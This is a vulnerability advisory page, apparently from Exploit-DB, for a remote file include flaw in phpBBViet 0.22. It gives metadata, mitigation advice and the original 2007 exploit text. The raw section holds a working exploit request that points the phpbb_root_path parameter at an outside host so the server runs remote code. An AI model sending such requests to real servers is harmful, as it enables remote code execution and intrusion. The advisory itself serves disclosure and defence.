phpBBViet 0.22 (phpbb_root_path) Remote File Include

vendor:

phpBBViet

by:

xoron

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpBBViet

Affected Version From: 0.22

Affected Version To: 0.22

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

phpBBViet 0.22 (phpbb_root_path) Remote File Include

This exploit allows an attacker to include remote files by manipulating the phpbb_root_path parameter in the functions_mod_user.php file of phpBBViet 0.22. The attacker can execute arbitrary code or gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of phpBBViet or apply the necessary security patches provided by the vendor.

Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

phpBBViet 0.22 (phpbb_root_path) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: xoron

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Exploit:

/includes/functions_mod_user.php?phpbb_root_path=http://netdevilz ?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://sourceforge.net/project/showfiles.php?group_id=193675

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thanx: ZeberuS - Madtoxic - Deep Emperor  and All Netdevilz member

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

# milw0rm.com [2007-11-17]